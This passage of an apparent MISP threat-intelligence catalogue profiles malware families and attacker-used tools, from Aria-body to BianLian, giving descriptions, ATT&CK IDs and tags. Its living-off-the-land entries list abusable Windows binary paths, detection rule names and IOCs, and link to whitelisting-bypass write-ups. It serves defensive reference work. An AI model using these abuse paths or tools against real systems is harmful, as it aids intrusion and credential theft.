tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'a2e000da-8181-4327-bacd-32013dbd3654', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Aria-body
Aria-body is a custom backdoor that has been used by Naikon since approximately 2017.[CheckPoint Naikon May 2020]
Internal MISP references
UUID 7ba79887-d496-47aa-8b71-df7f46329322, which can be used as a unique global reference for Aria-body in MISP communities and other software using the MISP galaxy.
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0456 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Arp
Arp displays and modifies information about a system's Address Resolution Protocol (ARP) cache. [TechNet Arp]
Internal MISP references
UUID 45b51950-6190-4572-b1a2-7c69d865251e
which can be used as unique global reference for Arp
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0099 |
source | MITRE |
tags | ['509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Aspnet_Compiler
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: ASP.NET Compilation Tool
Author: Jimmy (@bohops)
Paths:
* c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
* c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Resources:
* https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
* https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
Detection:
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
* Sigma: proc_creation_win_lolbin_aspnet_compiler.yml [Aspnet_Compiler.exe - LOLBAS Project]
Internal MISP references
UUID 42763dde-8226-4f31-a3ba-face2da84dd2
which can be used as unique global reference for Aspnet_Compiler
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5084 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ASPXSpy
ASPXSpy is a Web shell. It has been modified by Threat Group-3390 actors to create the ASPXTool version. [Dell TG-3390]
Internal MISP references
UUID a0cce010-9158-45e5-978a-f002e5c31a03
which can be used as unique global reference for ASPXSpy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0073 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Astaroth
Astaroth is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America. It has been known publicly since at least late 2017. [Cybereason Astaroth Feb 2019][Cofense Astaroth Sept 2018][Securelist Brazilian Banking Malware July 2020]
Internal MISP references
UUID ea719a35-cbe9-4503-873d-164f68ab4544
which can be used as unique global reference for Astaroth
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0373 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
AsyncRAT
AsyncRAT is an open-source remote access tool originally available through the NYANxCAT Github repository that has been used in malicious campaigns.[Morphisec Snip3 May 2021][Cisco Operation Layover September 2021][Telefonica Snip3 December 2021]
Internal MISP references
UUID d587efff-4699-51c7-a4cc-bdbd1b302ed4
which can be used as unique global reference for AsyncRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1087 |
source | MITRE |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '2feda37d-5579-4102-a073-aa02e82cb49f', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
at
at is used to schedule tasks on a system to run at a specified date or time.[TechNet At][Linux at]
Internal MISP references
UUID af01dc7b-a2bc-4fda-bbfe-d2be889c2860
which can be used as unique global reference for at
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0110 |
source | MITRE |
tags | ['5bc4c6c6-36df-4a53-920c-53e17d7027db', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Atbroker
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Helper binary for Assistive Technology (AT)
Author: Oddvar Moe
Paths:
* C:\Windows\System32\Atbroker.exe
* C:\Windows\SysWOW64\Atbroker.exe
Resources:
* http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
Detection:
* Sigma: proc_creation_win_lolbin_susp_atbroker.yml
* Sigma: registry_event_susp_atbroker_change.yml
* IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
* IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
* IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware [Atbroker.exe - LOLBAS Project]
Internal MISP references
UUID 2efae55c-86f3-4234-af26-1c75e922d81a
which can be used as unique global reference for Atbroker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5085 |
source | Tidal Cyber |
tags | ['85a29262-64bd-443c-9e08-3ee26aac859b', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Atera Agent
Atera Agent is a legitimate remote administration tool (specifically a remote management and maintenance ("RMM") solution) that adversaries have used as a command and control tool for remote code execution, tool ingress, and persisting in victim environments.[U.S. CISA PaperCut May 2023]
Internal MISP references
UUID f8113a9f-a706-46df-8370-a9cef1c75f30
which can be used as unique global reference for Atera Agent
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5014 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '9a5ed991-6fe7-49fe-8536-91defc449b18', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '992bdd33-4a47-495d-883a-58010a2f0efb', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Atomic Stealer
Atomic Stealer is an information-stealing malware ("infostealer") designed to harvest passwords, cookies, and other sensitive information from macOS systems. It is often delivered via malicious download sites promoted via malvertising.[Malwarebytes 9 6 2023]
Internal MISP references
UUID ce914eea-8db9-425b-8ae2-a56a264b4951
which can be used as unique global reference for Atomic Stealer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['macOS'] |
software_attack_id | S5314 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Attor
Attor is a Windows-based espionage platform that has been seen in use since 2013. Attor has a loadable plugin architecture to customize functionality for specific targets.[ESET Attor Oct 2019]
Internal MISP references
UUID 89c35e9f-b435-4f58-9073-f24c1ee8754f
which can be used as unique global reference for Attor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0438 |
source | MITRE |
type | ['malware'] |
AuditCred
AuditCred is a malicious DLL that has been used by Lazarus Group during their 2018 attacks.[TrendMicro Lazarus Nov 2018]
Internal MISP references
UUID d0c25f14-5eb3-40c1-a890-2ab1349dff53
which can be used as unique global reference for AuditCred
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0347 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
AutoIt backdoor
AutoIt backdoor is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. [Forcepoint Monsoon] This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.
Internal MISP references
UUID 3f927596-5219-49eb-bd0d-57068b0e04ed
which can be used as unique global reference for AutoIt backdoor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0129 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Automim
Researchers describe Automim as a "collection of .cmd, .vbs and .bat files that automate the execution" of the Mimikatz and LaZagne credential harvesting tools.[CrowdStrike Endpoint Security Testing Oct 2021]
Internal MISP references
UUID 984249bd-6421-4133-bd2a-25f330b4b441
which can be used as unique global reference for Automim
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5277 |
source | Tidal Cyber |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
AuTo Stealer
AuTo Stealer is malware written in C++ that has been used by SideCopy since at least December 2021 to target government agencies and personnel in India and Afghanistan.[MalwareBytes SideCopy Dec 2021]
Internal MISP references
UUID 649a4cfc-c0d0-412d-a28c-1bd4ed604ea8
which can be used as unique global reference for AuTo Stealer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1029 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Avaddon
Avaddon is ransomware written in C++ that has been offered as Ransomware-as-a-Service (RaaS) since at least June 2020.[Awake Security Avaddon][Arxiv Avaddon Feb 2021]
Internal MISP references
UUID bad92974-35f6-4183-8024-b629140c6ee6
which can be used as unique global reference for Avaddon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0640 |
source | MITRE |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Avenger
Avenger is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]
Internal MISP references
UUID e5ca0192-e905-46a1-abef-ce1119c1f967
which can be used as unique global reference for Avenger
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0473 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
AvosLocker
AvosLocker is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, AvosLocker had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.[Malwarebytes AvosLocker Jul 2021][Trend Micro AvosLocker Apr 2022][Joint CSA AvosLocker Mar 2022]
Internal MISP references
UUID e792dc8d-b0f4-5916-8850-a61ff53125d0
which can be used as unique global reference for AvosLocker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S1053 |
source | MITRE |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'c3779a84-8132-4c62-be2f-9312ad41c273', 'ce9f1048-09c1-49b0-a109-dd604afbf3cd', 'fe3eb26d-6daa-4f82-b0dd-fc1e2fffbc2b', '9e4936f0-e3b7-4721-a638-58b2d093b2f2', '24448a05-2337-4bc9-a889-a83f2fd1f3ad', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Azorult
Azorult is a commercial Trojan that is used to steal information from compromised hosts. Azorult has been observed in the wild as early as 2016. In July 2018, Azorult was seen used in a spearphishing campaign against targets in North America. Azorult has been seen used for cryptocurrency theft. [Unit42 Azorult Nov 2018][Proofpoint Azorult July 2018]
Internal MISP references
UUID cc68a7f0-c955-465f-bee0-2dacbb179078
which can be used as unique global reference for Azorult
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0344 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Babuk
Babuk is a Ransomware-as-a-service (RaaS) malware that has been used since at least 2021. The operators of Babuk employ a "Big Game Hunting" approach to targeting major enterprises and operate a leak site to post stolen data as part of their extortion scheme.[Sogeti CERT ESEC Babuk March 2021][McAfee Babuk February 2021][CyberScoop Babuk February 2021]
Internal MISP references
UUID 0dc07eb9-66df-4116-b1bc-7020ca6395a1
which can be used as unique global reference for Babuk
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0638 |
source | MITRE |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'b5962a84-f1c7-4d0d-985c-86301db95129', '12124060-8392-49a3-b7b7-1dde3ebc8e67', '915e7ac2-b266-45d7-945c-cb04327d6246', 'd713747c-2d53-487e-9dac-259230f04460', 'fde4c246-7d2d-4d53-938b-44651cf273f1', '964c2590-4b52-48c6-afff-9a6d72e68908', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', 'a2e000da-8181-4327-bacd-32013dbd3654'] |
type | ['malware'] |
BabyShark
BabyShark is a Microsoft Visual Basic (VB) script-based malware family that is believed to be associated with several North Korean campaigns. [Unit42 BabyShark Feb 2019]
Internal MISP references
UUID ebb824a2-abff-4bfd-87f0-d63cb02b62e6
which can be used as unique global reference for BabyShark
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0414 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BackConfig
BackConfig is a custom Trojan with a flexible plugin architecture that has been used by Patchwork.[Unit 42 BackConfig May 2020]
Internal MISP references
UUID 2763ad8c-cf4e-42eb-88db-a40ff8f96cf9
which can be used as unique global reference for BackConfig
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0475 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Backdoor.Oldrea
Backdoor.Oldrea is a modular backdoor that was used by Dragonfly against energy companies since at least 2013. Backdoor.Oldrea was distributed via supply chain compromise and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.[Symantec Dragonfly][Gigamon Berserk Bear October 2021][Symantec Dragonfly Sept 2017]
Internal MISP references
UUID f7cc5974-767c-4cb4-acc7-36295a386ce5
which can be used as unique global reference for Backdoor.Oldrea
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0093 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BACKSPACE
BACKSPACE is a backdoor used by APT30 that dates back to at least 2005. [FireEye APT30]
Internal MISP references
UUID d0daaa00-68e1-4568-bb08-3f28bcd82c63
which can be used as unique global reference for BACKSPACE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0031 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Backstab
Backstab is a tool used to terminate antimalware-protected processes.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 5a9a7a54-21cb-4a5c-bef0-d37f8678bf46
which can be used as unique global reference for Backstab
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5026 |
source | Tidal Cyber |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'd469efcf-4feb-4149-9c0f-c4b7821960bd', 'e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
BADCALL
BADCALL is a Trojan malware variant used by the group Lazarus Group. [US-CERT BADCALL]
Internal MISP references
UUID d7aa53a5-0912-4952-8f7f-55698e933c3b
which can be used as unique global reference for BADCALL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0245 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BADFLICK
BADFLICK is a backdoor used by Leviathan in spearphishing campaigns first reported in 2018 that targeted the U.S. engineering and maritime industries.[FireEye Periscope March 2018][Accenture MUDCARP March 2019]
Internal MISP references
UUID 8c454294-81cb-45d0-b299-818994ad3e6f
which can be used as unique global reference for BADFLICK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0642 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BADHATCH
BADHATCH is a backdoor that has been utilized by FIN8 since at least 2019. BADHATCH has been used to target the insurance, retail, technology, and chemical industries in the United States, Canada, South Africa, Panama, and Italy.[Gigamon BADHATCH Jul 2019][BitDefender BADHATCH Mar 2021]
Internal MISP references
UUID 16481e0f-49d5-54c1-a1fe-16d9e7f8d08c
which can be used as unique global reference for BADHATCH
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1081 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BADNEWS
BADNEWS is malware that has been used by the actors responsible for the Patchwork campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. [Forcepoint Monsoon] [TrendMicro Patchwork Dec 2017]
Internal MISP references
UUID 34c24d27-c779-42a4-9f61-3f0d3fea6fd4
which can be used as unique global reference for BADNEWS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0128 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BadPatch
BadPatch is a Windows Trojan that was used in a Gaza Hackers-linked campaign.[Unit 42 BadPatch Oct 2017]
Internal MISP references
UUID 10e76722-4b52-47f6-9276-70e95fecb26b
which can be used as unique global reference for BadPatch
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0337 |
source | MITRE |
type | ['malware'] |
BadPotato
BadPotato is an open-source software project that, according to its GitHub page, can be used for privilege escalation purposes.[GitHub BeichenDream BadPotato]
Internal MISP references
UUID 4b59bf81-d351-436e-aebc-f0111a892395
which can be used as unique global reference for BadPotato
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5304 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bad Rabbit
Bad Rabbit is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. Bad Rabbit has also targeted organizations and consumers in Russia. [Secure List Bad Rabbit][ESET Bad Rabbit][Dragos IT ICS Ransomware]
Internal MISP references
UUID a1d86d8f-fa48-43aa-9833-7355750e455c
which can be used as unique global reference for Bad Rabbit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0606 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '5a463cb3-451d-47f7-93e4-1886150697ce', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bandook
Bandook is a commercially available RAT, written in Delphi and C++, that has been available since at least 2007. It has been used against government, financial, energy, healthcare, education, IT, and legal organizations in the US, South America, Europe, and Southeast Asia. Bandook has been used by Dark Caracal, as well as in a separate campaign referred to as "Operation Manul".[EFF Manul Aug 2016][Lookout Dark Caracal Jan 2018][CheckPoint Bandook Nov 2020]
Internal MISP references
UUID 5c0f8c35-88ff-40a1-977a-af5ce534e932
which can be used as unique global reference for Bandook
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0234 |
source | MITRE |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2feda37d-5579-4102-a073-aa02e82cb49f', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bankshot
Bankshot is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, Lazarus Group used the Bankshot implant in attacks against the Turkish financial sector. [McAfee Bankshot]
Internal MISP references
UUID 24b8471d-698f-48cc-b47a-8fbbaf28b293
which can be used as unique global reference for Bankshot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0239 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bash
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: File used by Windows subsystem for Linux
Author: Oddvar Moe
Paths:
* C:\Windows\System32\bash.exe
* C:\Windows\SysWOW64\bash.exe
Detection:
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
* Sigma: proc_creation_win_lolbin_bash.yml
* IOC: Child process from bash.exe [Bash.exe - LOLBAS Project]
Internal MISP references
UUID cef3a09e-22ca-43dc-ad4a-95741a3b85ff
which can be used as unique global reference for Bash
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5086 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Bat Armor
Bat Armor is a tool used to generate .bat files using PowerShell scripts.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 628037d4-962d-4f58-b32d-241d739bc62d
which can be used as unique global reference for Bat Armor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5027 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Bazar
Bazar is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. Bazar reportedly has ties to TrickBot campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.[Cybereason Bazar July 2020]
Internal MISP references
UUID b35d9817-6ead-4dbd-a2fa-4b8e217f8eac
which can be used as unique global reference for Bazar
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0534 |
source | MITRE |
tags | ['818c3d93-c010-44f4-82bc-b63b4bc6c3c2', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BBK
BBK is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]
Internal MISP references
UUID 3daa5ae1-464e-4c0a-aa46-15264a2a0126
which can be used as unique global reference for BBK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0470 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BBSRAT
BBSRAT is malware with remote access tool functionality that has been used in targeted compromises. [Palo Alto Networks BBSRAT]
Internal MISP references
UUID be4dab36-d499-4ac3-b204-5e309e3a5331
which can be used as unique global reference for BBSRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0127 |
source | MITRE |
type | ['malware'] |
BendyBear
BendyBear is an x64 shellcode for a stage-zero implant designed to download malware from a C2 server. First discovered in August 2020, BendyBear shares a variety of features with Waterbear, malware previously attributed to the Chinese cyber espionage group BlackTech.[Unit42 BendyBear Feb 2021]
Internal MISP references
UUID a114a498-fcfd-4e0a-9d1e-e26750d71af8
which can be used as unique global reference for BendyBear
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0574 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bginfo
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Background Information Utility included with SysInternals Suite
Author: Oddvar Moe
Paths:
* No fixed path
Resources:
* https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
Detection:
* Sigma: proc_creation_win_lolbin_bginfo.yml
* Elastic: defense_evasion_unusual_process_network_connection.toml
* Elastic: defense_evasion_network_connection_from_windows_binary.toml
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules [Bginfo.exe - LOLBAS Project]
Internal MISP references
UUID fe926654-0cff-4e8e-b192-2fa1eb8a9a67
which can be used as unique global reference for Bginfo
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5207 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
BianLian Ransomware (Backdoor)
This Software object represents the custom backdoor tool used during intrusions conducted by the BianLian Ransomware Group.[U.S. CISA BianLian Ransomware May 2023][BianLian Ransomware Gang Gives It a Go! | [redacted]]
Delivers: TeamViewer[U.S. CISA BianLian Ransomware May 2023], Atera Agent[U.S. CISA BianLian Ransomware May 2023], Splashtop[U.S. CISA BianLian Ransomware May 2023], AnyDesk[U.S. CISA BianLian Ransomware May 2023]
Internal MISP references
